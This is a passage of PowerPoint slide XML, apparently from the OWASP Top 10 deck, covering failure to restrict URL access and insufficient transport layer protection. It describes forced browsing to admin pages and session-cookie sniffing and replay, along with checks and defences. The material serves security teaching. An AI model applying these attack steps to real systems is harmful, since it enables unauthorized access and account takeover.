            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A7</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48520"/>
          <a:ext cx="6858000" cy="253066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5302">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5575">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79783">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Anyone with network access can send your application a request. Could</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> anonymous users access a private page or regular users a privileged page? </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who is an authorized system user, simply changes the URL to a privileged page. Is access granted? Anonymous users could access private pages that aren’t protected.</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rPr>
                        <a:t>Applications are not always</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> protecting page requests properly. Sometimes, URL protection is managed via configuration, and the system is </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>misconfigured</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Sometimes, developers must include the proper code checks, and they forget.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detecting such flaws is easy. The hardest part is identifying which pages (URLs) exist to attack.</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allow attackers to access unauthorized functionality.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Administrative functions are key targets for this type of attack.</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exposed functions and the data they process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impact to your reputation if this vulnerability became public.</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attacker simply force browses to target URLs. Consider the following URLs which are both supposed to require authentication. Admin rights are also required for access to the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin_getappInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://example.com/app/getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://example.com/app/admin_getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the attacker is not authenticated, and access to either page is granted, then unauthorized access was allowed. If an authenticated, non-admin, user is allowed to access the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin_getappInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page, this is a flaw, and may lead the attacker to more improperly protected admin pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Such flaws are frequently introduced when links and buttons are simply not displayed to unauthorized users, but the application fails to protect the pages they target.</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has failed to properly restrict URL access is to verify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>every </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page. Consider for each page, is the page supposed to be public or private. If a private page:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is authentication required to access that page?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is it supposed to be accessible to ANY authenticated user? If not, is an authorization check made to ensure the user has permission to access that page?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External security mechanisms frequently provide authentication and authorization checks for page access. Verify they are properly configured for every page. If code level protection is used, verify that code level protection is in place for every required page. Penetration testing can also verify whether proper protection is in place.</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Top 10-2007 on Failure to Restrict URL Access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50" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ESAPI Access Control API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1"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Development Guide: Chapter on Authorization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Testing Guide: Testing for Path Traversal</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Article on Forced Browsing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For additional access control requirements, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>ASVS requirements area for Access Control (V4)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pP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285 on Improper Access Control (Authorization)</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unauthorized URL access requires selecting an approach for requiring proper authentication and proper authorization for each page. Frequently, such protection is provided by one or more components external to the application code. Regardless of the mechanism(s), all of the following are recommended: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The authentication and authorization policies be role based, to minimize the effort required to maintain these policies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The policies should be highly configurable, in order to minimize any hard coded aspects of the policy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The enforcement mechanism(s) should deny all access by default, requiring explicit grants to specific users and roles for access to every page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the page is involved in a workflow, check to make sure the conditions are in the proper state to allow access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Failure to Restrict URL Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A8</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48521"/>
          <a:ext cx="6858000" cy="253651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3135">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88599">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monitor the network traffic of your users. If the application is on the internet, who knows how your users access it. Don’t forget back end connections.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Monitoring users’ network traffic</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> can be difficult, but is sometimes easy. The primary difficulty lies in monitoring the proper network’s traffic while users are accessing the vulnerable site. </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rPr>
                        <a:t>Applications frequently do not </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>protect network traffic. They may use SSL/TLS during authentication, but not elsewhere, exposing data and session IDs to interception. Expired or improperly configured certificates may also be used.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detecting basic flaws is easy. Just observe the site’s network traffic. More subtle flaws require inspecting the design of the application and the server configuration. </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expose individual users’ data and can </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>lead to account theft. If an admin account was compromised, the entire site could be exposed. Poor SSL setup can also facilitate phishing  and MITM attacks.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data </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>exposed on the communications channel in terms of its confidentiality and integrity needs, and the need to authenticate both participants.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 site simply doesn’t use SSL for all pages that require authentication. Attacker simply monitors network traffic (like an open wireless or their neighborhood cable modem network), and observes an authenticated victim’s session cookie. Attacker then replays this cookie and takes over the user’s session.</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A site has improperly configured SSL certificate which causes browser warnings for its users. Users have to accept such warnings and continue, in order to use the site. This causes users to get accustomed to such warnings. Phishing attack against the site’s customers lures them to a lookalike site which doesn’t have a valid certificate, which generates similar browser warnings. Since victims are accustomed to such warnings, they proceed on and use the phishing site, giving away passwords or other private data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: A site simply uses standard ODBC/JDBC for the database connection, not realizing all traffic is in the clear.</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has insufficient transport layer protection is to verify that:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSL is used to protect all authentication related traffic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSL is used for all resources on all private pages and services. This protects all data and session tokens that are exchanged. Mixed SSL on a page should be avoided since it causes user warnings in the browser, and may expose the user’s session ID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Only strong algorithms are supported.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All session cookies have their ‘secure’ flag set so the browser never transmits them in the clear.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The server certificate is legitimate and properly configured for that server. This includes being issued by an authorized issuer, not expired, has not been revoked, and it matches all domains the site uses.</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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For a more complete set of requirements and problems to avoid in this area, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ASVS requirements on Communications Security (V10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a: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Transport Layer Protection Cheat Sheet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Top 10-2007 on Insecure Communications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Development Guide: Chapter on Cryptography</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Testing Guide: Chapter on SSL/TLS Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng"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319 on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t> Transmission of Sensitive Information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2"/>
              </a:rPr>
              <a:t>SSL Labs Server Test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3"/>
              </a:rPr>
              <a:t>Definition of FIPS 140-2 Cryptographic Standard</a:t>
            </a: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Providing proper transport layer protection can affect the site design. It’s easiest to require SSL for the entire site. For performance reasons, some sites use SSL only on private pages. Others use SSL only on ‘critical’ pages, but this can expose session IDs and other sensitive data. At a minimum, do all of the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Require SSL for all sensitive pages. Non-SSL requests to these pages should be redirected to the SSL page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ flag on all sensitive cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Configure your SSL provider to only support strong (e.g., FIPS 140-2 compliant) algorithms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure your certificate is valid, not expired, not revoked, and matches all domains used by the site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backend and other connections should also use SSL or other encryption technologies.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
